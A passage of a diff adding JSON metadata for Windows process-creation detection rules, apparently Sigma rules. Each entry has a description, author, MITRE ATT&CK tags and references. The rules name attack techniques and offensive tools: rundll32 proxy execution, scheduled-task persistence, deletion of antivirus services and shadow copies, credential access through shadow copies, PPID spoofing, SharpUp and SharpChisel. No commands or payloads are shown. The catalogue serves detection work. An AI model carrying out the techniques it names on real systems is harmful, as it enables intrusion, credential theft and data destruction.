+ "filename": "proc_creation_win_rundll32_registered_com_objects.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.persistence",
+ "attack.t1546.015"
+ ]
+ },
+ "uuid": "f1edd233-30b5-4823-9e6a-c4171b24d316",
+ "value": "Rundll32 Registered COM Objects"
+ },
+ {
+ "description": "Detects rundll32 execution where the DLL is located on a remote location (share)",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/08/10",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_rundll32_unc_path.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.execution",
+ "attack.t1021.002",
+ "attack.t1218.011"
+ ]
+ },
+ "uuid": "5cdb711b-5740-4fb2-ba88-f7945027afac",
+ "value": "Rundll32 UNC Path Execution"
+ },
+ {
+ "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module",
+ "meta": {
+ "author": "Bartlomiej Czyz, Relativity",
+ "creation_date": "2021/01/31",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_rundll32_without_parameters.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://bczyz1.github.io/2021/01/30/psexec.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1021.002",
+ "attack.t1570",
+ "attack.execution",
+ "attack.t1569.002"
+ ]
+ },
+ "uuid": "5bb68627-3198-40ca-b458-49f973db8752",
+ "value": "Rundll32 Without Parameters"
+ },
+ {
+ "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file",
+ "meta": {
+ "author": "Tim Shelton, Florian Roth, Yassine Oukessou (fix + fp)",
+ "creation_date": "2022/01/13",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_run_executable_invalid_extension.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/mrd0x/status/1481630810495139841?s=12",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml"
+ ],
+ "tags": "No established tags"
+ },
+ "uuid": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf",
+ "value": "Rundll32 Execution Without DLL File"
+ },
+ {
+ "description": "Payloads may be compressed, archived, or encrypted in order to avoid detection",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/26",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_run_from_zip.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_from_zip.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1485"
+ ]
+ },
+ "uuid": "1a70042a-6622-4a2b-8958-267625349abf",
+ "value": "Run from a Zip File"
+ },
+ {
+ "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)",
+ "meta": {
+ "author": "Sergey Soldatov, Kaspersky Lab, oscd.community",
+ "creation_date": "2019/10/30",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_run_powershell_script_from_ads.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_ads.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1564.004"
+ ]
+ },
+ "uuid": "45a594aa-1fbd-4972-a809-ff5a99dd81b8",
+ "value": "Run PowerShell Script from ADS"
+ },
+ {
+ "description": "Detects PowerShell script execution via input stream redirect",
+ "meta": {
+ "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community",
+ "creation_date": "2020/10/17",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_run_powershell_script_from_input_stream.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml",
+ "https://twitter.com/Moriarty_Meng/status/984380793383370752",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_input_stream.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.execution",
+ "attack.t1059"
+ ]
+ },
+ "uuid": "c83bf4b5-cdf0-437c-90fa-43d734f7c476",
+ "value": "Run PowerShell Script from Redirected Input Stream"
+ },
+ {
+ "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.",
+ "meta": {
+ "author": "Janantha Marasinghe",
+ "creation_date": "2020/09/26",
+ "falsepositive": [
+ "This may have false positives on hosts where Virtualbox is legitimately being used for operations"
+ ],
+ "filename": "proc_creation_win_run_virtualbox.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1564/006/",
+ "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_virtualbox.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1564.006",
+ "attack.t1564"
+ ]
+ },
+ "uuid": "bab049ca-7471-4828-9024-38279a4c04da",
+ "value": "Detect Virtualbox Driver Installation OR Starting Of VMs"
+ },
+ {
+ "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local",
+ "meta": {
+ "author": "pH-T, Nasreddine Bencherchali",
+ "creation_date": "2022/03/15",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_schtasks_appdata_local_system.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.persistence",
+ "attack.t1053.005",
+ "attack.t1059.001"
+ ]
+ },
+ "uuid": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967",
+ "value": "Suspicious Schtasks Execution AppData Folder"
+ },
+ {
+ "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00",
+ "meta": {
+ "author": "pH-T",
+ "creation_date": "2022/07/15",
+ "falsepositive": [
+ "Software installation"
+ ],
+ "filename": "proc_creation_win_schtasks_once_0000.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml"
+ ],
+ "tags": "No established tags"
+ },
+ "uuid": "970823b7-273b-460a-8afc-3a6811998529",
+ "value": "Uncommon Scheduled Task Once 00:00"
+ },
+ {
+ "description": "Detects suspicious powershell execution that ends with a common flag instead of a command or a filename to execute (could be a sign of implicit execution that uses files in WindowsApps directory)",
+ "meta": {
+ "author": "pH-T, Florian Roth",
+ "creation_date": "2022/04/08",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_schtasks_powershell_windowsapps_execution.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.persistence",
+ "attack.t1053.005",
+ "attack.t1059.001"
+ ]
+ },
+ "uuid": "b66474aa-bd92-4333-a16c-298155b120df",
+ "value": "Suspicious Powershell No File or Command"
+ },
+ {
+ "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.",
+ "meta": {
+ "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T",
+ "creation_date": "2022/02/12",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_schtasks_reg_loader.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.persistence",
+ "attack.t1053.005",
+ "attack.t1059.001"
+ ]
+ },
+ "uuid": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78",
+ "value": "Scheduled Task Executing Powershell Encoded Payload from Registry"
+ },
+ {
+ "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/07/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_schtasks_system.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.persistence",
+ "attack.t1053.005"
+ ]
+ },
+ "uuid": "89ca78fd-b37c-4310-b3d3-81a023f83936",
+ "value": "Schtasks Creation Or Modification With SYSTEM Privileges"
+ },
+ {
+ "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/02/13",
+ "falsepositive": [
+ "Legitimate usage of the tool"
+ ],
+ "filename": "proc_creation_win_screenconnect.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1219"
+ ]
+ },
+ "uuid": "57bff678-25d1-4d6c-8211-8ca106d12053",
+ "value": "Use of ScreenConnect Remote Access Software"
+ },
+ {
+ "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/02/25",
+ "falsepositive": [
+ "Case in which administrators are allowed to use ScreenConnect's Backstage mode"
+ ],
+ "filename": "proc_creation_win_screenconnect_anomaly.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
+ "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1219"
+ ]
+ },
+ "uuid": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5",
+ "value": "ScreenConnect Backstage Mode Anomaly"
+ },
+ {
+ "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).",
+ "meta": {
+ "author": "Sittikorn S",
+ "creation_date": "2021/06/21",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_script_event_consumer_spawn.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://redcanary.com/blog/child-processes/",
+ "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_script_event_consumer_spawn.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1047"
+ ]
+ },
+ "uuid": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34",
+ "value": "Script Event Consumer Spawning Process"
+ },
+ {
+ "description": "Detects when attackers use \"sc.exe\" to delete AV services from the system in order to avoid detection",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/08/01",
+ "falsepositive": [
+ "Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such)"
+ ],
+ "filename": "proc_creation_win_sc_delete_av_services.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "7fd4bb39-12d0-45ab-bb36-cebabc73dc7b",
+ "value": "Suspicious Execution of Sc to Delete AV Services"
+ },
+ {
+ "description": "Detects execution of \"sc.exe\" to query information about registered services on the system",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/06",
+ "falsepositive": [
+ "Legitimate query of a service by an administrator to get more information such as the state or PID"
+ ],
+ "filename": "proc_creation_win_sc_query.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_query.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1007"
+ ]
+ },
+ "uuid": "57712d7a-679c-4a41-a913-87e7175ae429",
+ "value": "SC.EXE Query Execution"
+ },
+ {
+ "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.",
+ "meta": {
+ "author": "Markus Neis",
+ "creation_date": "2019/01/16",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_sdbinst_shim_persistence.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1546.011"
+ ]
+ },
+ "uuid": "517490a7-115a-48c6-8862-1a481504d5a8",
+ "value": "Possible Shim Database Persistence via sdbinst.exe"
+ },
+ {
+ "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.",
+ "meta": {
+ "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
+ "creation_date": "2020/05/02",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_sdclt_child_process.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/6",
+ "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.t1548.002"
+ ]
+ },
+ "uuid": "da2738f2-fadb-4394-afa7-0a0674885afa",
+ "value": "Sdclt Child Processes"
+ },
+ {
+ "description": "Detects the use of SDelete to erase a file not the free space",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/06/03",
+ "falsepositive": [
+ "System administrator usage"
+ ],
+ "filename": "proc_creation_win_sdelete.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdelete.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1485"
+ ]
+ },
+ "uuid": "a4824fca-976f-4964-b334-0621379e84c4",
+ "value": "Sysinternals SDelete Delete File"
+ },
+ {
+ "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)",
+ "meta": {
+ "author": "Nextron Systems",
+ "creation_date": "2022/06/01",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_sdiagnhost_susp_child.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/nao_sec/status/1530196847679401984",
+ "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/",
+ "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/",
+ "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036",
+ "attack.t1218"
+ ]
+ },
+ "uuid": "f3d39c45-de1a-4486-a687-ab126124f744",
+ "value": "Sdiagnhost Calling Suspicious Child Process"
+ },
+ {
+ "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/07/23",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_selectmyparent.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/",
+ "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks",
+ "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing",
+ "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_selectmyparent.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1134.004"
+ ]
+ },
+ "uuid": "52ff7941-8211-46f9-84f8-9903efb7077d",
+ "value": "PPID Spoofing Tool Usage"
+ },
+ {
+ "description": "Detects manual service execution (start) via system utilities.",
+ "meta": {
+ "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community",
+ "creation_date": "2019/10/21",
+ "falsepositive": [
+ "Legitimate administrator or user executes a service for legitimate reasons."
+ ],
+ "filename": "proc_creation_win_service_execution.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_execution.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1569.002"
+ ]
+ },
+ "uuid": "2a072a96-a086-49fa-bcb5-15cc5a619093",
+ "value": "Service Execution"
+ },
+ {
+ "description": "Detects a windows service to be stopped",
+ "meta": {
+ "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali",
+ "creation_date": "2019/10/23",
+ "falsepositive": [
+ "Administrator shutting down the service due to upgrade or removal purposes"
+ ],
+ "filename": "proc_creation_win_service_stop.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_stop.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1489"
+ ]
+ },
+ "uuid": "eb87818d-db5d-49cc-a987-d5da331fbd90",
+ "value": "Stop Windows Service"
+ },
+ {
+ "description": "Detects use of executionpolicy option to set insecure policies",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/11/01",
+ "falsepositive": [
+ "Administrator script"
+ ],
+ "filename": "proc_creation_win_set_policies_to_unsecure_level.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1",
+ "https://adsecurity.org/?p=2604",
+ "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001"
+ ]
+ },
+ "uuid": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180",
+ "value": "Change PowerShell Policies to an Insecure Level"
+ },
+ {
+ "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil",
+ "meta": {
+ "author": "Tim Rauch",
+ "creation_date": "2022/09/20",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_shadowcopy_deletion_via_powershell.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell",
+ "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadowcopy_deletion_via_powershell.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1490"
+ ]
+ },
+ "uuid": "21ff4ca9-f13a-41ad-b828-0077b2af2e40",
+ "value": "Deletion of Volume Shadow Copies via WMI with PowerShell"
+ },
+ {
+ "description": "Shadow Copies storage symbolic link creation using operating systems utilities",
+ "meta": {
+ "author": "Teymur Kheirkhabarov, oscd.community",
+ "creation_date": "2019/10/22",
+ "falsepositive": [
+ "Legitimate administrator working with shadow copies, access for backup purposes"
+ ],
+ "filename": "proc_creation_win_shadow_copies_access_symlink.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_access_symlink.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.002",
+ "attack.t1003.003"
+ ]
+ },
+ "uuid": "40b19fa6-d835-400c-b301-41f3a2baacaf",
+ "value": "Shadow Copies Access via Symlink"
+ },
+ {
+ "description": "Shadow Copies creation using operating systems utilities, possible credential access",
+ "meta": {
+ "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community",
+ "creation_date": "2019/10/22",
+ "falsepositive": [
+ "Legitimate administrator working with shadow copies, access for backup purposes"
+ ],
+ "filename": "proc_creation_win_shadow_copies_creation.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_creation.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003",
+ "attack.t1003.002",
+ "attack.t1003.003"
+ ]
+ },
+ "uuid": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce",
+ "value": "Shadow Copies Creation Using Operating Systems Utilities"
+ },
+ {
+ "description": "Shadow Copies deletion using operating systems utilities",
+ "meta": {
+ "author": "Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)",
+ "creation_date": "2019/10/22",
+ "falsepositive": [
+ "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason",
+ "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)"
+ ],
+ "filename": "proc_creation_win_shadow_copies_deletion.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "https://blog.talosintelligence.com/2017/05/wannacry.html",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/",
+ "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/",
+ "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100",
+ "https://github.com/Neo23x0/Raccine#the-process",
+ "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar",
+ "https://redcanary.com/blog/intelligence-insights-october-2021/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.impact",
+ "attack.t1070",
+ "attack.t1490"
+ ]
+ },
+ "uuid": "c947b146-0abc-4c87-9c64-b17e9d7274a2",
+ "value": "Shadow Copies Deletion Using Operating Systems Utilities"
+ },
+ {
+ "description": "Detects the use of SharpUp, a tool for local privilege escalation",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/08/20",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_sharpup.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/GhostPack/SharpUp",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharpup.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.t1615",
+ "attack.t1569.002",
+ "attack.t1574.005"
+ ]
+ },
+ "uuid": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1",
+ "value": "SharpUp PrivEsc Tool"
+ },
+ {
+ "description": "Detects usage of the Sharp Chisel via the commandline arguments",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/09/05",
+ "falsepositive": [
+ "Some false positives may occure with other tools with similar commandlines"
+ ],
+ "filename": "proc_creation_win_sharp_chisel_usage.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/shantanu561993/SharpChisel",
+ "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/",
